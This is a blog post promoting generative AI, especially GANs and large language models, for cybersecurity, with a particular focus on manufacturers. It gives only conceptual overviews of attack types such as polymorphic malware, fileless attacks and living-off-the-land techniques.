Skip to content
Home » Blogs » Strengthening Cybersecurity using Generative AI

Strengthening Cybersecurity using Generative AI

Cybercrimes and Increasing Impact

In 2023, the United Kingdom’s (UK) military data breach exposed sensitive personal information of 225,000 personnel. In 2024, the United States (US) department of justice charged four foreign nationals for cyber-attacks, targeting US agencies and defense contractors. In February 2024, United Health subsidiary processing insurance claims was hacked using ransomware attack. Several research outlets predict economic impact of such cybercrimes to $15T 2025, with a new attack happening every 14 seconds. The impact of such cybercrimes extends across the world communities – from private citizens to governments and academics to businesses.

Cybercrimes are hard to detect (or respond) for the vast attack surface (all possible entry or attack points – data sources, software, devices, network, social engineering etc), modes of penetration (social engineering, denial of service, advanced persistence threats etc), and duration of attacks. Cyber-criminals adopt ingenious high-tech ways creating a complex web of attack modes. The 2023 Cybersecurity report NSA, 2023 Cyber Strategy report Department of Defense (DoD) highlight the use of Artificial Intelligence (AI) cyber criminals in escalating their attack methods. Detection, localization and neutralization of such cyber-threats are not only difficult, but also, on occasions, goes unnoticed.

Robust Cybersecurity Protocol Is Required

Cybersecurity, a practice that guards the connected world from cybercrimes, is essential for the world community. It encapsulates a charter to handle the complex interdependencies between policies, processes, technologies and people. Technology plays a pivotal role in the security of critical resources and ways to catch the bad actors. A McKinsey report from 2022 reveals a $2 trillion market opportunity 2025 for the global cybersecurity technology and service providers. A recent survey report from Microsoft suggested that 58% of the manufacturers voted cybersecurity vulnerability as a severe challenge for achieving the factory of the future.

Generative AI Cybersecurity

Advanced cyber-threats require advanced cybersecurity. Generative AI coupled with deep-learning AI models offers a powerful mechanism for cybersecurity because it can analyze complex data sets, continuously learn evolving attack patterns, identify potential threats, and recommend mitigation and counterattack strategies.

Advanced cyber-attack methods:

Almost all advanced cyber-attack methods use metamorphism (or shapeshifting). They exemplify showing the following behavior on the vulnerable host-system:

  • Minimal to zero unique footprint
  • Do not consume significant persistent resources (such as file storage)
  • Mimic or shape-shift into one or more legitimate software tool behaviors
  • Dynamic and simultaneous polymorphism (or multiple shape-shifts in parallel)

Such behavior dodges traditional anti-malware systems that use static techniques such as pattern matching, white-listing, hashing, or foreign behavior patterns within the host-system.

Let’s visit four such important advanced attack patterns that are difficult to detect using traditional cybersecurity methods and software tools.

Four advanced cyber-attack methods

Advanced Polymorphic Malware: Polymorphic malware is an advanced malicious software that constantly modifies its code to evade detection. To achieve its disguise, it employs techniques like code obfuscation, dynamic encryption keys, and variable code structures.IoT and Software-Defined Everything (SDx) infrastructure face heightened security risks due to the vast array of outdated machine operating systems and custom scripts with insecure software standards.

Fileless Attacks: Most traditional cyber-attacks install (or create) files on the computer disk. In contrast, the fileless attacks operate entirely on memory and run within the memory segment of the legitimate vulnerable host program (such as power-shell, word processors, registry-keys and others). Aqua Security’s 2023 Cloud Native Threat Report noted a 1400% increase in fileless attacks over the previous year​.

Living Off the Land (LOTL) Techniques: Living Off the Land attack (LOTL) is a cyber-attack method that operates using files from already deployed legitimate software tools on the host system. Like Fileless attacks, LOTL also leaves no additional file footprint, however, LOTL changes the composition of some of the existing files, thus leaving a minimal footprint. The ability of LOTL to morph its activities to appear legitimate creates the toughest challenge to detect them.

Adversarial Attacks on AI Systems: This attack manipulates the data used to train an AI model or the model itself. This fools the model into making incorrect or malicious decisions. For example, such attacks compromise security cameras using facial recognition, or autonomous vehicle software recognizing the traffic lights.

Impact on Manufacturers

Analysis shows that manufacturing infrastructure displays unique vulnerabilities to cyberattacks due to the combination of the following: continued use of old hardware, software and proprietary communication protocols that have not been hardened for modern cyber-attacks, reliance on varied technologies for automation that operate at lower OSI (Open Systems Communications) layers (e.g., IOT, industrial control systems) causing the integration layers to create points of vulnerability, and prioritization of efficiency over security. The cyberattack impacts, however, cause the manufacturers massive losses.  For example, in 2023, Applied Materials, one of the world’s leading suppliers of equipment, services, and software for the manufacture of semiconductors, has warned that it would lose about $250 million due to a cybersecurity attack at one of its suppliers.

Many manufacturers struggle to implement robust security measures without disrupting critical operations, as OT systems require constant uptime and have limited maintenance windows. The potential for physical harm and safety risks adds another layer of complexity, as cyberattacks on OT systems can lead to equipment damage or even endanger human lives. Additionally, the shortage of personnel with both OT and cybersecurity expertise makes it difficult for manufacturers to adequately protect their industrial environments.

Generative AI powered solutions:

A Generative Adversarial Network (GAN) is a class of generative artificial intelligence that consists of two parts called generator and discriminator that work against each other. The generator creates new multi-modal data such as realistic images or code or text, and discriminator (generator’s adversary) tries to identify real-data from the generated (or synthetic) data. Through this ongoing competition, both parts improve over time.

GANs are useful for training systems to recognize and defend against new types of cyber threats detecting (foreign, induced or synthetic or malware) data. If researched in detail, GAN’s algorithms have a very impressive antidote to most advanced cyber-attacks and methods differentiating real-data from fake-data.

Adoption of Generative AI

Research & Analyst Community: Extensive research is published on how Generative Adversarial Networks (GANs) or their improved versions could create, mimic, and detect cyberattacks and their patterns. According to Google Scholar, roughly 23000 technical papers on cybersecurity cited GAN, with 11000+ in 2023 and 5000+ thus far in 2024. According to Google Patent site, roughly 1400+ patents were filed under cybersecurity in the last five years citing GAN. The CAGR of patent filing is highest in IOT/OT security. IEEE has published a detailed survey on “Generative Adversarial Networks in Security” where it was explained how GAN  is providing both security advances and attack scenarios in order to bypass detection systems: [Ref: https://ieeexplore.ieee.org/document/9298135]. Forrester’s report on “Top 5 cybersecurity threats for 2024: Weaponed AI is the new normal, Generative AI in general and GAN in particular is identified for its use.

Business Community: Palo Alto’s 2024 report on AI & Security, Splunk’s 2024 State of Security report, Cisco’s 2024 Threat Trends report and other reports from other major technology vendors ranging from network equipment to enterprise software have shown significant acceleration in adopting (and offering) Generative AI capabilities in addressing cybersecurity challenges.

Government & Security Establishment: DARPA and NSA, key players in cybersecurity AI research, are exploring GANs to create realistic cyberattack simulations for training and potentially develop defensive AI.

Large Language Model

The advent of a new class of Generative AI model called the Large Language Model (LLM) has opened a new avenue in bolstering the cybersecurity capabilities against advanced cyber-attacks. LLMs analyze and understand massive data (such as network traffic logs, malware code etc) to detect patterns and communicate in human understandable language. LLMs, unlike GANs, do not create new data, but manipulate and combine existing data patterns to create human readable content. LLMs offer a complementary ability to the cybersecurity community with GANs. LLMs are pre-trained on massive and disparate data sources. However, the draw-back of LLMs is the hallucination caused generic training data. There are methods to reduce hallucination grounding the model with additional contextual training (RAG, prompting and fine tuning).

LLMs can perform a critical role of being a true “intelligent entity” that can preserve the communication (or problem) context over a vast disparate data source, distributed computation nodes and over a long period of time. Such an ability is uniquely handy when a complex web of attack methods is used.

The use of LLMs for Cybersecurity is a latent but widely invested topic.

Conclusion

Cybersecurity is a high priority topic with a massive market size (across, private investments, business institutions, academics and government grants). It also demands highly advanced Artificial Intelligence based innovative solutions to mitigate the risk. The combination of Generative Adversarial Network (GAN) models and Large Language Model (LLM) shall provide advanced cybersecurity capabilities in detecting and neutralizing advanced cyber-attacks. There is a great opportunity for start-ups to focus in this area. I predict that soon there will be a massive upside for individuals and entities that focus on Cybersecurity with AI.

Taking a broader view of the cybersecurity challenges, it is important for every company to start with a cybersecurity protocol that includes a dedicated team of experts responsible for overall cybersecurity. Typically, they are led a Chief Information Security Officer (CISO), who should be equipped with autonomy for establishing a “security dome”. The CISO group should chair a cross functional team from the finance, operations and strategy domains. This will allow creating an execution plan those balances between business outcomes and security protocol.

Join the conversation

Your email address will not be published. Required fields are marked *